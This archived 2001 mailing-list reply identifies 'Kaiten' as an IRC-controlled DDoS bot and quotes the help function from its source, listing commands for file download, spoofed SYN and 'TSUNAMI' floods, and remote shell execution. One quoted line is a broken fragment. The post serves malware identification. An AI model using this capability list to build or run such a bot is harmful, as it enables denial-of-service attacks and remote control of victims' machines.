Re: Kaiten.exe DoS ?

From: Frijole (frijoleat_private)
Date: Mon May 07 2001 - 13:46:15 PDT

    this appears to be a ddos tool for irc. from kaiten.c help function
    (http://packetstorm.securify.com/DoS/kaiten.c):

    void help(int sock, char *sender, int argc, char **argv) {
     if (mfork() != 0) return;
     Send(sock,"NOTICE %s :GET <http address> <save as>                     =
    Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
     Send(sock,"NOTICE %s :TSUNAMI <target> <secs>                          =
    Special packeter that wont be blocked by most firewalls\n",sender);
    sleep(2);
     Send(sock,"NOTICE %s :NICK <nick>                                      =
    Changes the nick of the knight\n",sender); sleep(2);
     Send(sock,"NOTICE %s :GETSPOOF                                         =
    Gets the current spoofing\n",sender); sleep(2);
     Send(sock,"NOTICE %s :PAN <target> <secs>                              = An
    advanced syn flooder that will kill most network drivers\n",sender);
    sleep(2);
    special++ exploit\n",sender); sleep(2);
     Send(sock,"NOTICE %s :SPOOFS <subnet>                                  =
    Changes spoofing to a subnet\n",sender); sleep(2);
     Send(sock,"NOTICE %s :DNS <host>                                       =
    DNSs a host\n",sender); sleep(2);
     Send(sock,"NOTICE %s :CHECKSUM <on/off>                                =
    Turns checksum on or off\n",sender); sleep(2);
     Send(sock,"NOTICE %s :IRC <command>                                    =
    Sends this command to the server\n",sender); sleep(2);
     Send(sock,"NOTICE %s :SH <command>                                     =
    Executes a command\n",sender); sleep(2);
     Send(sock,"NOTICE %s :KILLALL                                          =
    Kills all current packeting\n",sender); sleep(2);
     Send(sock,"NOTICE %s :KILL                                             =
    Kills the knight\n",sender); sleep(2);
     Send(sock,"NOTICE %s :DISABLE                                          =
    Disables all packeting from this knight\n",sender); sleep(2);
     Send(sock,"NOTICE %s :ENABLE                                           =
    Enables all packeting from this knight\n",sender); sleep(2);
     Send(sock,"NOTICE %s :VERSION                                          =
    Requests version of knight\n",sender); sleep(2);
     Send(sock,"NOTICE %s :HELP                                             =
    Displays this\n",sender);
     exit(0);
    }

    Youn Gonzales